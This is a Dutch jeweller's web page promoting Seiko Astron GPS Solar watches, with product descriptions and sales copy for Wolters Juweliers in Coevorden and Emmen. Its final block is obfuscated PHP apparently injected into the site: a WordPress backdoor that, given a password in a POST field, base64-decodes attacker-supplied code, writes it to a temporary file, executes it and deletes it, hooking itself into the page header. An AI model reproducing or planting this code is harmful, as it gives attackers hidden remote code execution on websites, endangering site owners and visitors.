Seiko-Astron-Wolters-Emmen-Coevorden-Juweliers

De nieuwe Seiko Astron

Het horloge dat altijd de juiste tijd weergeeft. Wereldwijd. Met een druk op de knop en uitsluitend gebruik makend van door licht opgewekte energie, kan een Astron GPS Solar horloge contact leggen met 4 of meer satellieten, de tijdzone identificeren en de wijzers boven de wijzerplaat op de juiste lokale tijd zetten. Met een maximale afwijking van 1 seconde per 100.000 jaar. Het ideale horloge voor de frequente reiziger. Nu verkrijgbaar bij Wolters Juweliers Coevorden Emmen.

Bij Wolters Juweliers vindt u altijd de nieuwste collectie Seiko Astron horloges. Wij zijn Elitedealer van Seiko horloges. Dit betekent dat eventuele reparaties met voorrang worden uitgevoerd en dat we als eerste de nieuwste collecties in onze winkels hebben liggen. Waaronder ook de exclusieve modellen die alleen verkocht worden bij de Elite Dealer.

Seiko-Astron-hoge-kwaliteit-ruime-collectie-en-uitstekende-service-dealer-Wolters-Juweliers-Coevorden-Emmen-vlakbij-Hardenberg-en-Hoogeveen

Bekijk hieronder een greep uit onze collectie Seiko Astron horloges

Seiko Astron. Wolters Juweliers Coevorden Emmen heeft de collectie in huis. Klanten uit Hardenberg en Hoogeveen komen naar ons om ze te zien.

Seiko Astron

Seiko Astron GPS Solar: tijd zonder grenzen.

Wolters Juweliers en Seiko Astron.
Wolters Juweliers Coevorden Emmen vindt het super om juist de Seiko Astron u te mogen laten zien en laten voelen, omdat de Seiko Astron ongekend bijzonder is. Het draagt fijn, zit lekker. Het is heel onwaarschijnlijk als je door het glas kijkt, je ziet geen glas want dit is zó helder. En door de GPS functie staat uw horloge op de milliseconde op tijd en datum. Het boegbeeld horloge waar Djokovic mee tennist heeft extra nagehard titanium in combinatie met keramiek.  Kortom, topkwaliteit, dat voel je en zie je. Wolters Juweliers Coevorden Emmen hebben de topmodellen in huis, kom in de zaak voor meer informatie.

Seiko Astron

Seiko Astron GPS Solar. Het horloge dat zich aan alle tijdzones op aarde kan aanpassen.
Eindelijk is de zoektocht naar EXACT de juiste tijd, waar dan ook op aarde, voorbij. De ontwikkeling van een eigen, gepatenteerde en ultrazuinige micro GPS ontvanger stelde SEIKO in staat om een horloge te creëren dat de signalen van het wereldwijde GPS-netwerk kan ontvangen. En zodoende niet alleen waar dan ook ter wereld de tijdzone kan herkennen, maar ook tijd- en datum data feilloos kan identificeren.
Wij kunnen er meer over vertellen en u mag ze zien en passen.
Liever een afspraak maken?

Seiko-Astron-GPS-Solar-topmodellen-bij-Wolters-Juweliers-Coevorden-Emmen
Atoomklok precisie, overal ter wereld.

Eén keer per dag ontvangt een SEIKO Astron automatisch het tijdsignaal. Maar de drager kan ook zelf, met één druk op de knop, contact leggen met 4 of meer GPS satellieten. Op deze wijze bepaalt het zijn positie op aarde en dus de tijdzone, waarna het de wijzers met atoomklok precisie op de juiste locale tijd zet. Een Astron wordt gevoed door een Solar wijzerplaat – die vrijwel alle vormen van licht in energie kan omzetten. Het vervangen van de batterij is dan ook niet meer nodig. En dankzij de Perpetual Calendar functie geeft een Astron de datum tot februari 2100 gegarandeerd juist weer. Tevens is iedere Astron voorzien van een in-flight modus en een ‘Daylight Saving Time’ functie.

De meest essentiële tijden in één oogopslag!

‘Tijdreizen’ over de hele wereld, het kan niet gemakkelijker dan met de nieuwe Astron 8X53 Dual-Time. De SEIKO Astron legt contact met het GPS netwerk, slechts gebruik makend van de kracht van het licht en met een simpele druk op de knop. Het Astron horloge geeft vervolgens - met atoomklokprecisie - de juiste tijd in de tijdzone waar het horloge zich bevindt.

Het nieuwe Dual-Time kaliber zorgt ervoor dat de drager niet alleen precies weet hoe laat het is op de plaats waar hij zich fysiek bevindt, maar óók hoe laat het – bijvoorbeeld – thuis is. Dat toont de Astron Dual-Time in een eenvoudige sub dial met 12 uur-weergave en een aparte AM/ PM indicator. Daarnaast wordt de weekdag weergegeven in een retrograde display op de 2-uur positie. De datum is zichtbaar op de 4-uur positie en wordt dankzij SEIKO’s Perpetual Calendar tot 28 februari 2100 feilloos bijgehouden. Reizen door ’s werelds tijdzones is al stressvol genoeg; de gemakkelijke elektronische bediening via de kroon maakt tijdreizen met een Astron in ieder geval een stuk gemakkelijker, en zeker ook leuker.

Seiko-Astron-GPS-Solar-titanium-horloges-verkooppunt-Wolters-Juweliers-Coevorden-Emmen

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}